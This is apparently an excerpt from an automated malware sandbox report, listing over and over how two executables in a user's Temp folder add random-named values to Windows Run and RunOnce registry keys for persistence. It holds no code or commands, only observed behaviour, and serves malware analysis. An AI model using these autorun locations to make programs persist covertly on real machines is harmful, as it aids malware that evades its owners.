Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
